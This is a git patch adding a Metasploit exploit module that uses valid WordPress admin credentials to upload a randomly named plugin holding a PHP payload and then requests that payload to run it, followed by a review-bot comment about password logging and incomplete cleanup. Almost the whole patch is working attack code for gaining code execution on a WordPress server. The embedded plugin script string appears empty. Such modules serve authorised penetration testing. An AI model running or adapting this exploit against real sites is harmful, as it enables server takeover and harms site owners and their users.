From 7d30b214ee11fb6c81e633dfd2dfd6fc7f2dab8b Mon Sep 17 00:00:00 2001
From: rastating
Date: Sat, 21 Feb 2015 01:31:33 +0000
Subject: [PATCH] Add WordPress admin shell upload module
---
.../unix/webapp/wp_admin_shell_upload.rb | 95 +++++++++++++++++++
1 file changed, 95 insertions(+)
create mode 100644 modules/exploits/unix/webapp/wp_admin_shell_upload.rb
diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
new file mode 100644
index 0000000000..41010ea3de
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FileDropper
+ include Msf::HTTP::Wordpress
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'WordPress Admin Shell Upload',
+ 'Description' => %q{
+ This module will generate a plugin, pack the payload into it
+ and upload it to a server running WordPress providing valid
+ admin credentials are used.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Rob Carr ' # Metasploit module
+ ],
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['WordPress', {}]],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+ OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+ ], self.class)
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def referer_uri
+ normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
+ end
+
+ def generate_plugin(plugin_name, payload_name)
+ r = Random.new
+ plugin_script = %Q{}
+
+ zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+ zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+ zip.add_file("#{plugin_name}/#{payload_name}", payload.encoded)
+ zip
+ end
+
+ def exploit
+ fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+ print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+ cookie = wordpress_login(username, password)
+ fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+ print_good("#{peer} - Authenticated with WordPress")
+
+ print_status("#{peer} - Preparing payload...")
+ plugin_name = Rex::Text.rand_text_alpha(10)
+ payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+ payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_name)
+ zip = generate_plugin(plugin_name, payload_name)
+
+ print_status("#{peer} - Uploading payload...")
+ uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
+ fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+ print_status("#{peer} - Executing the payload at #{payload_uri}...")
+ register_files_for_cleanup(payload_name)
+ register_files_for_cleanup("#{plugin_name}.php")
+ send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+ end
+end
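Review bot: The first status line in `exploit` prints the admin password in clear text (`using #{username}:#{password}`), so the credential lands in console scrollback, spooled output and any engagement logs that get shared later. Printing only the account name is enough for the operator, e.g. `print_status("#{peer} - Authenticating with WordPress as #{username}...")`. The two `register_files_for_cleanup` calls name the plugin's two files but not the plugin directory, and cleanup presumably depends on a session being opened, so a run whose final request fails may leave the uploaded plugin on the tested site; a comment or a `print_warning` telling the operator which path to remove by hand would help. `referer_uri` and the local `r` in `generate_plugin` look unused in the lines visible here.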